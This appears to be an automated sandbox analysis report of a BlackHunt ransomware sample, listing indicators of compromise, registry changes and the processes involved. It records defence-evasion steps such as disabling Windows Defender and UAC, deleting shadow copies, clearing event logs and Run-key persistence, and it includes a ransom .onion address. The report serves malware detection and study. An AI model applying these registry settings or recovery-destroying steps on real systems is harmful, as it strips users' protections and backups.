Analysis
-
max time kernel
92s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18-01-2024 22:34
Static task
static1
Behavioral task
behavioral1
Sample
13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe
Resource
win10v2004-20231215-en
General
-
Target
13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe
-
Size
707KB
-
MD5
5f9d9a6a0816019f305d40038d15ae11
-
SHA1
a9817a66eaf850ce672265de5dee88bde80d5230
-
SHA256
13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4
-
SHA512
03f7ee75e7357fb9f151e4d479317f88236a9a8eb0115fc87416b44f78bc748d8e11a6e29d2de524b83f931c17c6f30986a63274a492f29e599016502bfdd6a1
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza108pvnh:6uaTmkZJ+naie5OTamgEoKxLWXNh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 8152 fsutil.exe 9916 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 9376 wevtutil.exe 7908 wevtutil.exe 9976 wevtutil.exe 10484 wevtutil.exe 10904 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 4928 bcdedit.exe 7812 bcdedit.exe 6056 bcdedit.exe 5184 bcdedit.exe -
Renames multiple (3394) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 8148 wbadmin.exe 6536 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\N: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\K: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\P: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\S: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\M: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\I: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\L: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\X: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\Y: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\T: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\G: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\H: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\E: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\Z: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\A: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\J: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\R: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\U: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\O: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\V: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened (read-only) \??\Q: 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\#BlackHunt_ReadMe.hta 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\ICU\icudt26l.dat 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\#BlackHunt_ReadMe.txt 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ru-ru\#BlackHunt_ReadMe.hta 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\logo_retina.png 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\es-es\ui-strings.js 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\PFM\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\xerces.md 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\#BlackHunt_ReadMe.hta 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\ui-strings.js 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\#BlackHunt_ReadMe.txt 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pl-pl\ui-strings.js 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\require\2.1.15\#BlackHunt_ReadMe.hta 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\check-mark-1x.png 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pt-br\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\#BlackHunt_ReadMe.hta 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-Bold.otf 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files\CopyConfirm.png 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\#BlackHunt_ReadMe.txt 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\#BlackHunt_ReadMe.hta 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sk-sk\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\es-es\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\ui-strings.js 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\da-dk\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\ui-strings.js 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\es-es\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pl-pl\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\ui-strings.js 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\es-es\#BlackHunt_ReadMe.hta 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_wob.png 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ru-ru\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\ui-strings.js 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\#BlackHunt_ReadMe.txt 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pt-br\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\cs-cz\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hr-hr\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\sv-se\ui-strings.js 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\tr-tr\ui-strings.js 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\#BlackHunt_ReadMe.hta 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ja-jp\ui-strings.js 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-cn\#BlackHunt_ReadMe.hta 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-si\ui-strings.js 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\#BlackHunt_ReadMe.txt 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\ui-strings.js 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\#BlackHunt_Private.key 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sv-se\#BlackHunt_ReadMe.hta 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\#BlackHunt_ReadMe.txt 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_pl_135x40.svg 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nb-no\#BlackHunt_ReadMe.txt 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#BlackHunt_ReadMe.hta 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\duplicate.svg 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-gb\#BlackHunt_ReadMe.hta 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 14324 4052 WerFault.exe 293 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 8548 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 7224 vssadmin.exe 8564 vssadmin.exe 8408 vssadmin.exe 10908 vssadmin.exe 4304 vssadmin.exe 7836 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 8436 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings cmd.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 9848 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe Token: SeRestorePrivilege 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe Token: SeBackupPrivilege 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe Token: SeTakeOwnershipPrivilege 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe Token: SeAuditPrivilege 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe Token: SeSecurityPrivilege 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe Token: SeIncBasePriorityPrivilege 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe Token: SeBackupPrivilege 7132 vssvc.exe Token: SeRestorePrivilege 7132 vssvc.exe Token: SeAuditPrivilege 7132 vssvc.exe Token: SeBackupPrivilege 7936 wbengine.exe Token: SeRestorePrivilege 7936 wbengine.exe Token: SeSecurityPrivilege 7936 wbengine.exe Token: SeSecurityPrivilege 9376 wevtutil.exe Token: SeBackupPrivilege 9376 wevtutil.exe Token: SeSecurityPrivilege 9976 wevtutil.exe Token: SeBackupPrivilege 9976 wevtutil.exe Token: SeSecurityPrivilege 7908 wevtutil.exe Token: SeBackupPrivilege 7908 wevtutil.exe Token: SeSecurityPrivilege 10484 wevtutil.exe Token: SeBackupPrivilege 10484 wevtutil.exe Token: SeSecurityPrivilege 10904 wevtutil.exe Token: SeBackupPrivilege 10904 wevtutil.exe Token: SeDebugPrivilege 8436 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1448 wrote to memory of 2012 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 91 PID 1448 wrote to memory of 2012 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 91 PID 1448 wrote to memory of 3300 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 162 PID 1448 wrote to memory of 3300 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 162 PID 1448 wrote to memory of 4360 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 93 PID 1448 wrote to memory of 4360 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 93 PID 1448 wrote to memory of 2888 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 159 PID 1448 wrote to memory of 2888 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 159 PID 1448 wrote to memory of 3120 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 96 PID 1448 wrote to memory of 3120 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 96 PID 1448 wrote to memory of 4764 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 101 PID 1448 wrote to memory of 4764 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 101 PID 2012 wrote to memory of 4820 2012 cmd.exe 102 PID 2012 wrote to memory of 4820 2012 cmd.exe 102 PID 4360 wrote to memory of 1184 4360 cmd.exe 119 PID 4360 wrote to memory of 1184 4360 cmd.exe 119 PID 3300 wrote to memory of 3660 3300 cmd.exe 103 PID 3300 wrote to memory of 3660 3300 cmd.exe 103 PID 1448 wrote to memory of 4888 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 118 PID 1448 wrote to memory of 4888 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 118 PID 2888 wrote to memory of 4920 2888 Conhost.exe 104 PID 2888 wrote to memory of 4920 2888 Conhost.exe 104 PID 1448 wrote to memory of 3420 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 110 PID 1448 wrote to memory of 3420 1448 13d816b2fd223f6fccdf85a56ca6383defcf0d989880956d98c19b90f2a8ecc4.exe 110 PID 